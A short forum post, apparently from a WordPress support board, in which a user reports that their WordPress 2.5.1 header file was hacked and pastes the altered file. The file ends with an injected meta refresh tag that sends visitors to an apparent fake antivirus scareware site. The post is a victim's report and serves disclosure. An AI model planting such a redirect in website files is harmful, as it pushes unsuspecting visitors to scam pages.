My 2.5.1 installation got hacked!
-
I don’t know if I’m the first person ever to have this happen, but something hacked into my wp-blog-header.php and altered the file to look like this:
<?php if (! isset($wp_did_header)): if ( !file_exists( dirname(__FILE__) . '/wp-config.php') ) { if (strpos($_SERVER['PHP_SELF'], 'wp-admin') !== false) $path = ''; else $path = 'wp-admin/'; require_once( dirname(__FILE__) . '/wp-includes/classes.php'); require_once( dirname(__FILE__) . '/wp-includes/functions.php'); require_once( dirname(__FILE__) . '/wp-includes/plugin.php'); wp_die("There doesn't seem to be a <code>wp-config.php</code> file. I need this before we can get started. Need more help? <a href='https://codex.www.ads-software.com/Editing_wp-config.php'>We got it</a>. You can create a <code>wp-config.php</code> file through a web interface, but this doesn't work for all server setups. The safest way is to manually create the file. <a href='{$path}setup-config.php' class='button'>Create a Configuration File</a>", "WordPress › Error"); } $wp_did_header = true; require_once( dirname(__FILE__) . '/wp-config.php'); wp(); require_once(ABSPATH . WPINC . '/template-loader.php'); endif; ?> <meta http-equiv="Refresh" content="1; url=https://www.antivirusxp2008.com/scanner/51e7eaa47e59669de1029742c7e77ab4/5/">So, yes, basically they added a redirection to another page, where don’t is spelled as “dont” and which is disguised to look like Windows XP alert page.
I don’t know if this is related to some serious vulnerability, but I hope I did the right thing by posting this here.
- The topic ‘My 2.5.1 installation got hacked!’ is closed to new replies.